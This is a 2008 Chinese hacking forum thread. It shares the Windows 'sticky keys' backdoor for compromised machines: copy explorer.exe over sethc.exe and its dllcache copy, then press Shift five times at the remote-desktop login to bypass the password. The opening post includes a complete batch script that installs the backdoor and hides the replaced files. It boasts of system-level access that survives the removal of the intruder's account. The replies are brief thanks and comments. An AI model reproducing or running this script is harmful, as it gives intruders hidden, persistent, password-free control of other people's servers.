came3 发表于 2008-2-22 15:31
无需输入密码登陆3389远程终端在肉鸡上执行命令
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。
似乎2000也可以,XP不行。这两个系统没测试。
不知道有牛人知道是什么道理不.
小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe
Shift后门TT整理版
来源:TT\'s Blog
将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~
然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe
或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~
哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:TT 整合 QQ:869293
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:TT QQ: 869293
echo.
echo
[color=#0000ff]http://www.hack518.net[size=2]echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
xzfzoo1 发表于 2008-2-22 17:29
首先怎么才能copy呢?既然是肉鸡了,什么不能做呀,装个小木马不就行了。。。
jaisen 发表于 2008-2-23 19:24
多谢谢分享
顶!!!
:lol
zhxg_sy 发表于 2008-2-23 22:05
鸡肋的方法,支持一楼
fisher0917 发表于 2008-2-24 13:18
初学者,看不懂,顶一下
jaisen 发表于 2008-2-29 10:53
谢谢分享!参考一下
coolkone 发表于 2008-3-17 16:14
初学者,看不懂,顶一下
本文来自: 中国网管论坛(bbs.bitsCN.com) 详细出处参考:
http://bbs.bitscn.com/157061ybbihsse 发表于 2008-3-17 16:17
呵呵,反正就是看不懂